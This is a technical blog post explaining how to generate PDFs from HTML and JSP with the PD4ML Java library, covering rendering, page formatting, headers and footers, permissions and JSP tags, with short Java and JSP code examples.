PDF Generation using PD4ML2010-04-05T00:00:00-07:002010-04-05T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2010-04-05:/posts/pdf-generation-using-pd4ml.htmlOur Project required PDF generation at various stages of the application and the uploading the same into the FileNet FTP. PD4ML was used for generation and saving the file locally into the server from which the PDF got generated to the FileNet.<h3 id="project-usage">Project Usage</h3>
<p>Our project required generating PDFs at various stages of the
application and uploading them to the FileNet FTP server. PD4ML was used
to generate each PDF and save it locally on the server, from which it was
then uploaded to FileNet. PD4ML was chosen because our application used
the Struts framework: the data needed in the PDF was supplied through
Struts, and the layout was designed in HTML and CSS. This gave us a clean
separation between the presentation and business layers for dynamic,
online PDF generation.</p>
<h3 id="introduction-to-pd4ml">Introduction to PD4ML</h3>
<p>PD4ML is a powerful PDF generating tool that uses HTML and CSS
(Cascading Style Sheets) as page layout and content definition format.
Written in 100% pure Java, it allows users to easily add PDF generation
functionality to end products. PD4ML can be used either as a command
line operation or in Web applications for online PDF generation from
HTML and JSP templates.</p>
<h3 id="pd4ml-as-a-command-line-operation">PD4ML as a Command Line Operation</h3>
<p>PD4ML can be used for HTML to PDF transformation from a command line
application. There are many ways to achieve this conversion; the most
commonly used methods are as follows:</p>
<h4 id="creating-a-pdf-from-a-url-string">Creating a PDF from a URL String</h4>
<p>The PDF can be generated from an HTML file whose URL is passed to the
render() method.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">zefer</span><span class="op">.</span><span class="im">pd4ml</span><span class="op">.</span><span class="im">PD4ML</span><span class="op">;</span></span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a><span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">zefer</span><span class="op">.</span><span class="im">pd4ml</span><span class="op">.</span><span class="im">PD4Constants</span><span class="op">;</span></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a><span class="kw">......</span><span class="op">..</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a><span class="fu">File</span> f <span class="op">=</span> <span class="kw">new</span> <span class="bu">File</span><span class="op">(</span><span class="st">"D:/tools/test.pdf"</span><span class="op">);</span></span>
<span id="cb1-6"><a aria-hidden="true" href="#cb1-6" tabindex="-1"></a>java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileOutputStream</span> fos <span class="op">=</span> <span class="kw">new</span> java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileOutputStream</span><span class="op">(</span>f<span class="op">);</span></span>
<span id="cb1-7"><a aria-hidden="true" href="#cb1-7" tabindex="-1"></a>PD4ML pd4ml <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4ML</span><span class="op">();</span></span>
<span id="cb1-8"><a aria-hidden="true" href="#cb1-8" tabindex="-1"></a>pd4ml<span class="op">.</span><span class="fu">render</span><span class="op">(</span> urlstring<span class="op">,</span> fos <span class="op">);</span></span></code></pre></div>
<p><strong>Steps Involved</strong></p>
<ol type="1">
<li>Import the PD4ML converter class.</li>
<li>Define the HTML-to-PDF conversion parameters if needed, such as
user space width, HTML element arrangement and vertical size.</li>
<li>Prepare the output stream for PDF generation.</li>
<li>Instantiate the PD4ML converter.</li>
<li>Pass the HTML-to-PDF conversion parameters to it.</li>
<li>Perform the HTML-to-PDF translation.</li>
</ol>
<p><strong>Converting HTML obtained from input stream to
PDF</strong></p>
<p>A URL is not required for converting HTML into a PDF. PD4ML can also
read the source HTML from an input stream and use that stream for the
conversion.</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="bu">File</span> f <span class="op">=</span> <span class="kw">new</span> <span class="bu">File</span><span class="op">(</span><span class="st">"D:/tools/test.pdf"</span><span class="op">);</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a>java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileOutputStream</span> fos <span class="op">=</span> <span class="kw">new</span> java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileOutputStream</span><span class="op">(</span>f<span class="op">);</span></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a><span class="bu">File</span> fz <span class="op">=</span> <span class="kw">new</span> <span class="bu">File</span><span class="op">(</span><span class="st">"D:/tools/yahoo.htm"</span><span class="op">);</span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a>java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileInputStream</span> fis <span class="op">=</span> <span class="kw">new</span> java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileInputStream</span><span class="op">(</span>fz<span class="op">);</span></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a><span class="bu">InputStreamReader</span> isr <span class="op">=</span> <span class="kw">new</span> <span class="bu">InputStreamReader</span><span class="op">(</span> fis<span class="op">,</span> <span class="st">"UTF-8"</span> <span class="op">);</span></span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a>PD4ML html <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4ML</span><span class="op">();</span></span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a><span class="bu">URL</span> base <span class="op">=</span> <span class="kw">new</span> <span class="bu">URL</span><span class="op">(</span> <span class="st">"file:D:/tools/"</span> <span class="op">);</span></span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a>html<span class="op">.</span><span class="fu">render</span><span class="op">(</span> isr<span class="op">,</span> fos<span class="op">,</span> base <span class="op">);</span></span></code></pre></div>
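<p>The snippet above leaves its streams open, and the reader depends on the
charset being stated explicitly. As a hedged illustration of the stream
handling only (no PD4ML call is made), the following sketch reads HTML from
an input stream as UTF-8 and closes it with try-with-resources; the class
and method names are hypothetical.</p>

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.Reader;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;

// Sketch only: reads an HTML source stream fully, decoding it as UTF-8.
final class HtmlStreamSketch {

    // Returns the stream content as text; the stream is closed on exit.
    static String readHtml(InputStream in) {
        StringBuilder html = new StringBuilder();
        try (Reader reader = new InputStreamReader(in, StandardCharsets.UTF_8)) {
            char[] buffer = new char[4096];
            int count;
            while ((count = reader.read(buffer)) != -1) {
                html.append(buffer, 0, count);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return html.toString();
    }
}
```

<p>The same try-with-resources pattern applies to the
<code>FileOutputStream</code> that receives the PDF, so the file is flushed
and released even if rendering fails.</p>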
<h3 id="formatting-the-pdf-document-generated">Formatting the PDF
document generated</h3>
<p>The generated PDF can be formatted using various methods.
Some of the most commonly used ones are given below:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a>PD4ML html <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4ML</span><span class="op">();</span></span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a>html<span class="op">.</span><span class="fu">setPageSize</span><span class="op">(</span> <span class="kw">new</span> <span class="bu">Dimension</span><span class="op">(</span><span class="dv">450</span><span class="op">,</span> <span class="dv">450</span><span class="op">)</span> <span class="op">);</span></span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a><span class="co">//defines page size in points. A set of predefined page format constants is available in the PD4Constants interface.</span></span>
<span id="cb3-4"><a aria-hidden="true" href="#cb3-4" tabindex="-1"></a>html<span class="op">.</span><span class="fu">setPageInsets</span><span class="op">(</span> <span class="kw">new</span> <span class="bu">Insets</span><span class="op">(</span><span class="dv">20</span><span class="op">,</span> <span class="dv">50</span><span class="op">,</span> <span class="dv">10</span><span class="op">,</span> <span class="dv">10</span><span class="op">)</span> <span class="op">);</span></span>
<span id="cb3-5"><a aria-hidden="true" href="#cb3-5" tabindex="-1"></a><span class="co">//specifies page insets in points</span></span>
<span id="cb3-6"><a aria-hidden="true" href="#cb3-6" tabindex="-1"></a>html<span class="op">.</span><span class="fu">setHtmlWidth</span><span class="op">(</span> <span class="dv">750</span> <span class="op">);</span></span>
<span id="cb3-7"><a aria-hidden="true" href="#cb3-7" tabindex="-1"></a><span class="co">//defines desired HTML page width in screen pixels. Virtually it can be seen as a web browser window horizontal resize</span></span>
<span id="cb3-8"><a aria-hidden="true" href="#cb3-8" tabindex="-1"></a>html<span class="op">.</span><span class="fu">enableImgSplit</span><span class="op">(</span> <span class="kw">false</span> <span class="op">);</span></span>
<span id="cb3-9"><a aria-hidden="true" href="#cb3-9" tabindex="-1"></a><span class="co">//disables splitting of images across page breaks. By default the option is true (splitting enabled).</span></span></code></pre></div>
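<p>Page size and insets are given in points, where one point is 1/72 of an
inch. When a layout is specified in millimetres, a small conversion helper
avoids hand-computed values. The helper below is a hypothetical sketch and
is not part of the PD4ML API.</p>

```java
// Sketch only: converts millimetres to PDF points (1 point = 1/72 inch).
final class PageSizeSketch {

    static final double POINTS_PER_INCH = 72.0;
    static final double MM_PER_INCH = 25.4;

    // Rounds to the nearest whole point, as Dimension and Insets take ints.
    static int mmToPoints(double millimetres) {
        return (int) Math.round(millimetres / MM_PER_INCH * POINTS_PER_INCH);
    }
}
```

<p>For an A4 sheet (210 mm by 297 mm) this gives 595 by 842 points, which
could be passed to <code>new Dimension(595, 842)</code>.</p>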
<h4 id="for-generating-text-only-header-and-footer">For Generating
Text-Only Header and Footer</h4>
<p>Static or template text can be used for the header and footer of the
PDF document. The header and the footer can be set with various formats. A
few of them are:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a>PD4PageMark header <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4PageMark</span><span class="op">();</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setAreaHeight</span><span class="op">(</span> <span class="dv">20</span> <span class="op">);</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a><span class="co">//defines height of the header or footer area</span></span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setTitleTemplate</span><span class="op">(</span> <span class="st">"title: $[title]"</span> <span class="op">);</span></span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a><span class="co">//defines a template for page title representation.</span></span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a><span class="co">//No title is printed, if the titleTemplate is set to null. Default value is null.</span></span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setTitleAlignment</span><span class="op">(</span> PD4PageMark<span class="op">.</span><span class="fu">CENTER_ALIGN</span> <span class="op">);</span></span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a><span class="co">//defines alignment for the page title string in the document's header or footer</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setPageNumberAlignment</span><span class="op">(</span> PD4PageMark<span class="op">.</span><span class="fu">LEFT_ALIGN</span> <span class="op">);</span></span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a><span class="co">//defines alignment for the page numbers in the document's header or footer area</span></span>
<span id="cb4-11"><a aria-hidden="true" href="#cb4-11" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setPageNumberTemplate</span><span class="op">(</span> <span class="st">"#$[page]"</span> <span class="op">);</span></span>
<span id="cb4-12"><a aria-hidden="true" href="#cb4-12" tabindex="-1"></a><span class="co">//defines a template for page number representation</span></span>
<span id="cb4-13"><a aria-hidden="true" href="#cb4-13" tabindex="-1"></a>PD4PageMark footer <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4PageMark</span><span class="op">();</span></span>
<span id="cb4-14"><a aria-hidden="true" href="#cb4-14" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setAreaHeight</span><span class="op">(</span> <span class="dv">30</span> <span class="op">);</span></span>
<span id="cb4-15"><a aria-hidden="true" href="#cb4-15" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-16"><a aria-hidden="true" href="#cb4-16" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setFontSize</span><span class="op">(</span> <span class="dv">20</span> <span class="op">);</span></span>
<span id="cb4-17"><a aria-hidden="true" href="#cb4-17" tabindex="-1"></a><span class="co">//sets font size for the header or footer</span></span>
<span id="cb4-18"><a aria-hidden="true" href="#cb4-18" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setColor</span><span class="op">(</span> <span class="bu">Color</span><span class="op">.</span><span class="fu">red</span> <span class="op">);</span></span>
<span id="cb4-19"><a aria-hidden="true" href="#cb4-19" tabindex="-1"></a><span class="co">//setColor() sets the color of header or footer text</span></span>
<span id="cb4-20"><a aria-hidden="true" href="#cb4-20" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setPagesToSkip</span><span class="op">(</span> <span class="dv">1</span> <span class="op">);</span></span>
<span id="cb4-21"><a aria-hidden="true" href="#cb4-21" tabindex="-1"></a><span class="co">//defines a number of pages from the document beginning, that should not be marked with the header or footer info</span></span>
<span id="cb4-22"><a aria-hidden="true" href="#cb4-22" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setTitleTemplate</span><span class="op">(</span> <span class="st">"[ $[title] ]"</span> <span class="op">);</span></span>
<span id="cb4-23"><a aria-hidden="true" href="#cb4-23" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-24"><a aria-hidden="true" href="#cb4-24" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setPageNumberTemplate</span><span class="op">(</span> <span class="st">"page: $[page]"</span> <span class="op">);</span></span>
<span id="cb4-25"><a aria-hidden="true" href="#cb4-25" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-26"><a aria-hidden="true" href="#cb4-26" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setTitleAlignment</span><span class="op">(</span> PD4PageMark<span class="op">.</span><span class="fu">RIGHT_ALIGN</span> <span class="op">);</span></span>
<span id="cb4-27"><a aria-hidden="true" href="#cb4-27" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-28"><a aria-hidden="true" href="#cb4-28" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setPageNumberAlignment</span><span class="op">(</span> PD4PageMark<span class="op">.</span><span class="fu">LEFT_ALIGN</span> <span class="op">);</span></span>
<span id="cb4-29"><a aria-hidden="true" href="#cb4-29" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-30"><a aria-hidden="true" href="#cb4-30" tabindex="-1"></a></span>
<span id="cb4-31"><a aria-hidden="true" href="#cb4-31" tabindex="-1"></a>pd4ml<span class="op">.</span><span class="fu">setPageHeader</span><span class="op">(</span> header <span class="op">);</span></span>
<span id="cb4-32"><a aria-hidden="true" href="#cb4-32" tabindex="-1"></a>pd4ml<span class="op">.</span><span class="fu">setPageFooter</span><span class="op">(</span> footer <span class="op">);</span></span></code></pre></div>
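<p>The title and page number templates contain the placeholders
<code>$[title]</code> and <code>$[page]</code>. To make the effect of a
template concrete, the sketch below expands those two placeholders with
plain string replacement. It is an illustration under that assumption only,
not PD4ML's implementation, and the class and method names are
hypothetical.</p>

```java
// Sketch only: illustrates what a page mark template might expand to.
final class PageMarkTemplateSketch {

    // Substitutes $[title] and $[page]; a null template prints nothing.
    static String expand(String template, String title, int page) {
        if (template == null) {
            return "";
        }
        return template
                .replace("$[title]", title)
                .replace("$[page]", String.valueOf(page));
    }
}
```

<p>With the header settings above, <code>expand("title: $[title]", "Report", 1)</code>
gives <code>title: Report</code> and <code>expand("#$[page]", "Report", 2)</code>
gives <code>#2</code>.</p>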
<h4 id="protecting-pdf-documents">Protecting PDF documents</h4>
<p>A PDF document can be encrypted to protect its contents from
unauthorized access. PD4ML supports the PDF access permissions concept and
allows a password to be specified for a document. If any passwords or
access restrictions are specified with PD4ML.setPermissions(), the
document is encrypted, and the permissions and the information required to
validate the passwords are stored in the resulting document.</p>
<p>The possible restrictions are:</p>
<ol type="1">
<li>Modifying the document’s contents</li>
<li>Copying or otherwise extracting text and graphics from the
document</li>
<li>Adding or modifying text annotations</li>
<li>Printing the document</li>
</ol>
<p>The various types of pre-set Permissions available in the API
are:</p>
<ul>
<li>AllowAssembly</li>
<li>AllowContentExtraction</li>
<li>AllowCopy</li>
<li>AllowDegradedPrint</li>
<li>AllowModify</li>
<li>AllowPrint</li>
</ul>
<p>The PDF document produced by PD4ML can be protected with 40-bit or
128-bit encryption using the various Permission levels given above.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="bu">String</span> password <span class="op">=</span> <span class="st">"empty"</span><span class="op">;</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a><span class="dt">boolean</span> strongEncryption <span class="op">=</span> <span class="kw">true</span><span class="op">;</span></span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a><span class="dt">int</span> permissions <span class="op">=</span> PD4Constants<span class="op">.</span><span class="fu">AllowPrint</span> <span class="op">|</span> PD4Constants<span class="op">.</span><span class="fu">AllowCopy</span><span class="op">;</span></span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a>pd4ml<span class="op">.</span><span class="fu">setPermissions</span><span class="op">(</span> password<span class="op">,</span> permissions<span class="op">,</span> strongEncryption <span class="op">);</span></span></code></pre></div>
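<p>The permissions argument is an <code>int</code> built by OR-ing
constants together, which is the usual bit flag pattern. The sketch below
shows how such flags combine and how a single permission can be tested. The
bit values here are made up for illustration; the real values are defined
in <code>PD4Constants</code> and should be taken from there.</p>

```java
// Sketch only: hypothetical bit values, NOT the ones defined in PD4Constants.
final class PermissionFlagsSketch {

    static final int ALLOW_PRINT = 1 << 0;
    static final int ALLOW_COPY = 1 << 1;
    static final int ALLOW_MODIFY = 1 << 2;

    // True when every bit of the given flag is set in the permission mask.
    static boolean isAllowed(int permissions, int flag) {
        return (permissions & flag) == flag;
    }
}
```

<p>A mask of <code>ALLOW_PRINT | ALLOW_COPY</code> permits printing and
copying, while <code>isAllowed(mask, ALLOW_MODIFY)</code> returns
<code>false</code> because that bit was never set.</p>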
<p>Some of the other salient features available with PD4ML
are:</p>
<ul>
<li>Converting HTML headings or named anchors to PDF bookmarks</li>
<li>Named anchors</li>
<li>Inserting page breaks</li>
<li>Generating and sending PDFs by e-mail</li>
</ul>
<h3 id="using-pd4ml-in-web-applications-for-online-pdf-generation">Using
PD4ML in Web applications for online PDF generation</h3>
<p>PD4ML can be used in Web applications for online PDF generation from
HTML, JSP and Servlet templates. A simple example is given below:</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a><%@ taglib uri="http://pd4ml.com/tlds/pd4ml/2.5" prefix="pd4ml" %></span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a><%@ page contentType="text/html; charset=UTF-8" %></span>
<span id="cb6-3"><a aria-hidden="true" href="#cb6-3" tabindex="-1"></a></span>
<span id="cb6-4"><a aria-hidden="true" href="#cb6-4" tabindex="-1"></a><span class="dt"><</span><span class="kw">pd4ml:transform</span></span>
<span id="cb6-5"><a aria-hidden="true" href="#cb6-5" tabindex="-1"></a><span class="ot"> screenWidth</span><span class="op">=</span><span class="st">"400"</span></span>
<span id="cb6-6"><a aria-hidden="true" href="#cb6-6" tabindex="-1"></a><span class="ot"> pageFormat</span><span class="op">=</span><span class="st">"A5"</span></span>
<span id="cb6-7"><a aria-hidden="true" href="#cb6-7" tabindex="-1"></a><span class="ot"> pageOrientation</span><span class="op">=</span><span class="st">"landscape"</span></span>
<span id="cb6-8"><a aria-hidden="true" href="#cb6-8" tabindex="-1"></a><span class="ot"> pageInsets</span><span class="op">=</span><span class="st">"100,100,100,100,points"</span></span>
<span id="cb6-9"><a aria-hidden="true" href="#cb6-9" tabindex="-1"></a><span class="ot"> enableImageSplit</span><span class="op">=</span><span class="st">"false"</span><span class="dt">></span></span>
<span id="cb6-10"><a aria-hidden="true" href="#cb6-10" tabindex="-1"></a></span>
<span id="cb6-11"><a aria-hidden="true" href="#cb6-11" tabindex="-1"></a> <span class="dt"><</span><span class="kw">html</span><span class="dt">></span></span>
<span id="cb6-12"><a aria-hidden="true" href="#cb6-12" tabindex="-1"></a> <span class="dt"><</span><span class="kw">head</span><span class="dt">></span></span>
<span id="cb6-13"><a aria-hidden="true" href="#cb6-13" tabindex="-1"></a> <span class="dt"><</span><span class="kw">title</span><span class="dt">></span>pd4ml test<span class="dt"></</span><span class="kw">title</span><span class="dt">></span></span>
<span id="cb6-14"><a aria-hidden="true" href="#cb6-14" tabindex="-1"></a> <span class="dt"><</span><span class="kw">style</span><span class="ot"> type</span><span class="op">=</span><span class="st">"text/css"</span><span class="dt">></span></span>
<span id="cb6-15"><a aria-hidden="true" href="#cb6-15" tabindex="-1"></a> body {</span>
<span id="cb6-16"><a aria-hidden="true" href="#cb6-16" tabindex="-1"></a> <span class="kw">color</span><span class="ch">:</span> <span class="cn">red</span><span class="op">;</span></span>
<span id="cb6-17"><a aria-hidden="true" href="#cb6-17" tabindex="-1"></a> <span class="kw">background-color</span><span class="ch">:</span> <span class="cn">#FFFFFF</span><span class="op">;</span></span>
<span id="cb6-18"><a aria-hidden="true" href="#cb6-18" tabindex="-1"></a> <span class="kw">font-family</span><span class="ch">:</span> <span class="dv">Tahoma</span><span class="op">,</span> <span class="st">"Sans-Serif"</span><span class="op">;</span></span>
<span id="cb6-19"><a aria-hidden="true" href="#cb6-19" tabindex="-1"></a> <span class="kw">font-size</span><span class="ch">:</span> <span class="dv">10</span><span class="dt">pt</span><span class="op">;</span></span>
<span id="cb6-20"><a aria-hidden="true" href="#cb6-20" tabindex="-1"></a> }</span>
<span id="cb6-21"><a aria-hidden="true" href="#cb6-21" tabindex="-1"></a> <span class="dt"></</span><span class="kw">style</span><span class="dt">></span></span>
<span id="cb6-22"><a aria-hidden="true" href="#cb6-22" tabindex="-1"></a> <span class="dt"></</span><span class="kw">head</span><span class="dt">></span></span>
<span id="cb6-23"><a aria-hidden="true" href="#cb6-23" tabindex="-1"></a> <span class="dt"><</span><span class="kw">body</span><span class="dt">></span></span>
<span id="cb6-24"><a aria-hidden="true" href="#cb6-24" tabindex="-1"></a> <span class="dt"><</span><span class="kw">img</span><span class="ot"> src</span><span class="op">=</span><span class="st">"images/logos.gif"</span><span class="ot"> width</span><span class="op">=</span><span class="st">"125"</span><span class="ot"> height</span><span class="op">=</span><span class="st">"74"</span><span class="dt">></span></span>
<span id="cb6-25"><a aria-hidden="true" href="#cb6-25" tabindex="-1"></a> <span class="dt"><</span><span class="kw">p</span><span class="dt">></span></span>
<span id="cb6-26"><a aria-hidden="true" href="#cb6-26" tabindex="-1"></a> Hello, World!</span>
<span id="cb6-27"><a aria-hidden="true" href="#cb6-27" tabindex="-1"></a> <span class="dt"><</span><span class="kw">pd4ml:page.break</span><span class="dt">/></span></span>
<span id="cb6-28"><a aria-hidden="true" href="#cb6-28" tabindex="-1"></a> <span class="dt"><</span><span class="kw">table</span><span class="ot"> width</span><span class="op">=</span><span class="st">"100%"</span><span class="ot"> style</span><span class="op">=</span><span class="st">"background-color: #f4f4f4; color: #000000"</span><span class="dt">></span></span>
<span id="cb6-29"><a aria-hidden="true" href="#cb6-29" tabindex="-1"></a> <span class="dt"><</span><span class="kw">tr</span><span class="dt">></span></span>
<span id="cb6-30"><a aria-hidden="true" href="#cb6-30" tabindex="-1"></a> <span class="dt"><</span><span class="kw">td</span><span class="dt">></span></span>
<span id="cb6-31"><a aria-hidden="true" href="#cb6-31" tabindex="-1"></a> Hello, New Page!</span>
<span id="cb6-32"><a aria-hidden="true" href="#cb6-32" tabindex="-1"></a> <span class="dt"></</span><span class="kw">td</span><span class="dt">></span></span>
<span id="cb6-33"><a aria-hidden="true" href="#cb6-33" tabindex="-1"></a> <span class="dt"></</span><span class="kw">tr</span><span class="dt">></span></span>
<span id="cb6-34"><a aria-hidden="true" href="#cb6-34" tabindex="-1"></a> <span class="dt"></</span><span class="kw">table</span><span class="dt">></span></span>
<span id="cb6-35"><a aria-hidden="true" href="#cb6-35" tabindex="-1"></a> <span class="dt"></</span><span class="kw">body</span><span class="dt">></span></span>
<span id="cb6-36"><a aria-hidden="true" href="#cb6-36" tabindex="-1"></a> <span class="dt"></</span><span class="kw">html</span><span class="dt">></span></span>
<span id="cb6-37"><a aria-hidden="true" href="#cb6-37" tabindex="-1"></a><span class="dt"></</span><span class="kw">pd4ml:transform</span><span class="dt">></span></span></code></pre></div>
<p>In order to get a PDF output, we need to surround the HTML or JSP
with <code><pd4ml:transform></code> tags or refer to the markup from an external
PD4ML-enabled JSP or servlet.</p>
<ol type="1">
<li>PD4ML JSP taglib declaration and opening transform tag. JSP content
surrounded with <code><pd4ml:transform></code> and
<code></pd4ml:transform></code> tags is passed to the PD4ML
converter.</li>
<li>Images should be referenced with a relative path. Absolute URLs, like
<code>src="http://myserver:80/path/to/img.gif"</code>, are allowed as
well, but <code>src="/path/to/img.gif"</code> is not allowed.</li>
<li>The <code><pd4ml:page.break/></code> directive forces the PD4ML converter to insert a page break into the
output PDF.</li>
<li>Closing of the transformation tag. Any content that appears after
the tag is ignored.</li>
</ol>
<h4 id="defining-pdf-document-footer-or-header-with-jsp-custom-tag">Defining PDF document footer (or header) with JSP custom tag</h4>
<p>The header and/or footer for the PDF can be declared in the JSP in the
following fashion.</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a><span class="dt"><</span><span class="kw">pd4ml:footer</span></span>
<span id="cb7-2"><a aria-hidden="true" href="#cb7-2" tabindex="-1"></a><span class="ot"> titleTemplate</span><span class="op">=</span><span class="st">"[${title}]"</span></span>
<span id="cb7-3"><a aria-hidden="true" href="#cb7-3" tabindex="-1"></a><span class="ot"> pageNumberTemplate</span><span class="op">=</span><span class="st">"page ${page}"</span></span>
<span id="cb7-4"><a aria-hidden="true" href="#cb7-4" tabindex="-1"></a><span class="ot"> titleAlignment</span><span class="op">=</span><span class="st">"left"</span></span>
<span id="cb7-5"><a aria-hidden="true" href="#cb7-5" tabindex="-1"></a><span class="ot"> pageNumberAlignment</span><span class="op">=</span><span class="st">"right"</span></span>
<span id="cb7-6"><a aria-hidden="true" href="#cb7-6" tabindex="-1"></a><span class="ot"> color</span><span class="op">=</span><span class="st">"#008000"</span></span>
<span id="cb7-7"><a aria-hidden="true" href="#cb7-7" tabindex="-1"></a><span class="ot"> initialPageNumber</span><span class="op">=</span><span class="st">"1"</span></span>
<span id="cb7-8"><a aria-hidden="true" href="#cb7-8" tabindex="-1"></a><span class="ot"> pagesToSkip</span><span class="op">=</span><span class="st">"1"</span></span>
<span id="cb7-9"><a aria-hidden="true" href="#cb7-9" tabindex="-1"></a><span class="ot"> fontSize</span><span class="op">=</span><span class="st">"14"</span></span>
<span id="cb7-10"><a aria-hidden="true" href="#cb7-10" tabindex="-1"></a><span class="ot"> areaHeight</span><span class="op">=</span><span class="st">"18"</span><span class="dt">/></span></span></code></pre></div>
<h4 id="description">Description</h4>
<ol type="1">
<li><code>titleTemplate</code>: title template definition. A string that can optionally contain
the placeholders ${title}, for a title value taken from the HTML TITLE tag, and
${page}, for a page counter value.</li>
<li><code>pageNumberTemplate</code>: page number template definition. A string with the placeholder ${page}
for a page counter value.</li>
<li><code>initialPageNumber</code>: initializes the internal page counter with the given
value.</li>
<li><code>pagesToSkip</code>: with the value 1, one page is left without footer
information.</li>
<li><code>areaHeight</code>: footer area height in points.</li>
</ol>
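<p>To make the placeholder behaviour concrete, here is a minimal sketch of how a template such as <code>[${title}]</code> or <code>page ${page}</code> could be resolved. PD4ML does this substitution internally; the class and method names below are hypothetical and are not part of the PD4ML API.</p>

```java
// Illustration only: PD4ML resolves these placeholders internally.
// FooterTemplateSketch and render() are hypothetical names, not PD4ML API.
final class FooterTemplateSketch {

    // Replace the ${title} and ${page} placeholders with concrete values.
    // String.replace performs literal (non-regex) substitution.
    static String render(String template, String title, int page) {
        return template
                .replace("${title}", title)
                .replace("${page}", String.valueOf(page));
    }

    public static void main(String[] args) {
        // Same templates as in the footer tag above.
        System.out.println(render("[${title}]", "pd4ml test", 2));
        System.out.println(render("page ${page}", "pd4ml test", 2));
    }
}
```

<p>With the title "pd4ml test" on page 2, the two templates from the footer tag would resolve to <code>[pd4ml test]</code> and <code>page 2</code>.</p>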
<h4 id="adding-dynamic-data">Adding Dynamic data</h4>
<p>Dynamic data, such as session data or scriptlet output, can be used in the
PDF generation. A simple example is given below.</p>
<pre><code> <% String template = getFormattedDate() + ", page ${page} "; %>
<pd4ml:footer
pageNumberTemplate="<%=template%>"
.......
